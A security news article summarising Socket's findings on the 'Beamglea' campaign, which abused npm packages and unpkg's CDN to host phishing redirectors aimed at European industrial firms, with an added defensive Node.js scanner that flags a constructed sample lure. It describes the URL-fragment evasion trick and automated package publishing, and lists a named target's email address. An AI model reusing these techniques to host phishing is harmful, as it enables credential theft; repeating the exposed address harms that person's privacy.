Socket’s Threat Research Team has uncovered a massive supply-chain abuse campaign leveraging npm’s public registry and unpkg.com’s CDN as free hosting infrastructure for phishing attacks. The operation — tracked under the codename “Beamglea” — involves 175 malicious npm packages that have collectively accumulated over 26,000 downloads, and targeted more than 135 organizations across the industrial, energy, and technology sectors worldwide.
Unlike traditional supply chain attacks that infect developers’ systems through malicious code execution, Beamglea takes a subtler approach. The npm packages contain no code that runs on install; instead, the campaign exploits npm’s hosting and delivery mechanisms to store and serve redirect scripts that forward unsuspecting users to credential-harvesting pages hosted on attacker-controlled domains.
“The npm packages themselves don’t execute malicious code when installed via npm install. Instead, they exploit npm as free, global hosting infrastructure for phishing attacks,” the report explains.
Each package follows a naming convention like redirect-[a-z0-9]{6} — for example, redirect-nf0qo1 or redirect-xs13nr — and contains a single malicious JavaScript file, beamglea.js, hosted automatically on unpkg.com, a legitimate CDN that mirrors npm packages over HTTPS.
When a victim opens a phishing lure, such as an HTML “invoice” or “purchase order,” it loads the script directly from unpkg.
Because the script is served from a trusted, developer-centric domain over a valid HTTPS certificate, it passes most web filters and SSL certificate verification mechanisms without raising an alarm.
“The threat actors abuse this trusted infrastructure to host their phishing components without paying for servers or SSL certificates,” Socket noted.
Beamglea’s operators built automated Python tooling to mass-produce and publish the malicious packages. Each run of the tool generated a random package name, injected victim-specific data such as email addresses and phishing URLs into a JavaScript template, and then published it to npm automatically.
“The automation takes three inputs: a JavaScript template file (beamglea_template.js), the victim’s email address, and the phishing URL. It then authenticates to npm, processes templates, creates the package, publishes it, and generates an HTML lure,” the report revealed.
The code — which includes a redirect_generator.py script — can publish new packages under different npm accounts, creating fresh phishing infrastructure on demand.
This approach enabled rapid scaling:
- 175 packages published
- 9 npm author accounts used
- 630+ HTML phishing lures generated
Some packages even contained a cdn_setup_guide.txt, showing plans to migrate beyond npm to custom VPS-hosted CDNs, suggesting long-term operational intent.
“The presence of cdn_setup_guide.txt in some packages shows long-term planning,” Socket warned. “The guide provides instructions for setting up independent hosting infrastructure using VPS and Nginx, reducing reliance on unpkg.com’s CDN.”
At the heart of each Beamglea package lies beamglea.js, a deceptively simple redirector.
The script uses a clever evasion trick — appending the victim’s email after a # (URL fragment).
Because fragments are never sent in HTTP requests, they don’t appear in server logs or traffic captures, helping the attackers hide evidence while still allowing the phishing page’s JavaScript to read and pre-fill the victim’s email address.
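The following Node.js script is an added defensive example, not code from Socket’s report or from the campaign. It covers both points above: it scans a constructed HTML lure for unpkg-hosted script loaders whose package name matches the redirect-[a-z0-9]{6} convention or whose file is beamglea.js, and it splits a redirect target the way a browser does, showing that everything after # stays in the client and never reaches a server log. The sample lure, the package name redirect-ab12cd, and the host phish.example are constructed; the unpkg URL layout /<package>[@<version>]/<file> is assumed from unpkg’s documented scheme.

```javascript
// Added defensive example (not Socket's or the campaign's code).
// Constructed sample lure: the package name and hosts are made up and only
// follow the redirect-[a-z0-9]{6} / beamglea.js pattern described above.
const SAMPLE_LURE = `
<!DOCTYPE html>
<html><head><title>Purchase Order PO-0417</title></head>
<body>
<p>Loading document, please wait...</p>
<script src="https://unpkg.com/redirect-ab12cd/beamglea.js"></script>
<script src="https://unpkg.com/react@18.2.0/umd/react.production.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js"></script>
</body></html>`;

// Match <script ... src="..."> regardless of attribute order or quote style.
const SCRIPT_SRC_RE = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
// Assumed unpkg path layout: /<package>[@<version>]/<file>; scoped names start with @.
const UNPKG_PATH_RE = /^\/((?:@[^/@]+\/)?[^/@]+)(?:@[^/]+)?\/(.*)$/;
// Naming convention reported for the campaign's packages.
const REDIRECT_NAME_RE = /^redirect-[a-z0-9]{6}$/;

/**
 * Return every unpkg-hosted script referenced in `html`, with a verdict on
 * whether the package or file name matches the Beamglea pattern.
 */
function findUnpkgLoaders(html) {
  const hits = [];
  for (const m of html.matchAll(SCRIPT_SRC_RE)) {
    let url;
    try { url = new URL(m[1]); } catch { continue; } // skip relative or invalid src
    if (url.hostname !== 'unpkg.com') continue;
    const p = UNPKG_PATH_RE.exec(url.pathname);
    if (!p) continue;
    const [, pkg, file] = p;
    hits.push({
      src: m[1],
      pkg,
      file,
      suspicious: REDIRECT_NAME_RE.test(pkg) || file === 'beamglea.js',
    });
  }
  return hits;
}

/**
 * Split a redirect target the way a browser does: origin, path and query are
 * sent to the server (and land in access logs and proxy captures); the
 * fragment stays client-side and is visible only to the page's JavaScript.
 */
function splitRedirectTarget(href) {
  const u = new URL(href);
  return {
    sentToServer: u.origin + u.pathname + u.search,
    clientOnlyFragment: u.hash.startsWith('#') ? u.hash.slice(1) : '',
  };
}

// Stand-alone run: list flagged loaders and show what a server would log.
console.log(findUnpkgLoaders(SAMPLE_LURE));
console.log(splitRedirectTarget('https://phish.example/login.html#victim@example.com'));
```

Run with `node` to see the two unpkg references, only the first of which is flagged. The practical lesson for responders is in the second function: because the victim’s address travels in the fragment, proxy and web-server logs show only the bare phishing URL, so hunting for who was targeted has to rely on endpoint telemetry (browser history, DOM captures, mail-gateway inspection of the HTML attachment) rather than network logs.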
“The script appends the victim’s email as a URL fragment… The phishing page reads the email from JavaScript context and pre-fills login forms, creating an appearance of legitimacy,” Socket explained.
These details enhance the realism of the phishing pages, making victims believe they are accessing a legitimate portal — such as Microsoft 365, SAP, or internal enterprise systems.
Socket identified over 630 HTML files embedded within the npm packages, themed as purchase orders, engineering drawings, and project documentation — a classic form of business email compromise (BEC) social engineering.
The phishing infrastructure was distributed across seven attacker-controlled domains, with the primary domain being:
- cfn.jackpotmastersdanske[.]com
Secondary infrastructure included domains such as:
- musicboxcr[.]com
- villasmbuva[.]co[.]mz
- cfn.notwinningbutpartici[.]com
- elkendinsc[.]com
Some URLs carried base64-encoded tracking parameters revealing the campaign’s operational details — including Office 365 variants targeting non-MFA users.
“The o365_1_nom parameter indicates the phishing pages specifically target Office 365 accounts without multi-factor authentication enabled,” Socket observed.
The Beamglea campaign’s targeting is unusually focused for a phishing operation. Socket found 135 unique email addresses tied to over 100 organizations, mainly across Western Europe and Asia-Pacific.
Breakdown by sector:
- Industrial Manufacturing (35%) – ArcelorMittal, Demag Cranes, Stratasys, Algodue
- Technology & Networking (20%) – D-Link, Moxa, Renishaw
- Energy & Chemical (15%) – Sasol, ThyssenKrupp Nucera, H2 Systems
Notably, U.S.-based targets were absent, suggesting a regionally constrained campaign, possibly operated from Europe or Asia.
“Geographic targeting focused heavily on Western Europe (Germany, Netherlands, Belgium, Italy) with secondary focus on Nordic countries and Asia-Pacific. Notably absent were US-based targets,” the report confirmed.
One Croatian industrial contact — sraka@hust.hr — appeared in 19 separate packages, indicating either a high-value target or persistent phishing attempts.
While earlier npm threats injected malware directly into development environments, this campaign weaponized npm’s trust and ubiquity to host phishing infrastructure at scale, bypassing security controls by leveraging legitimate domains and SSL certificates.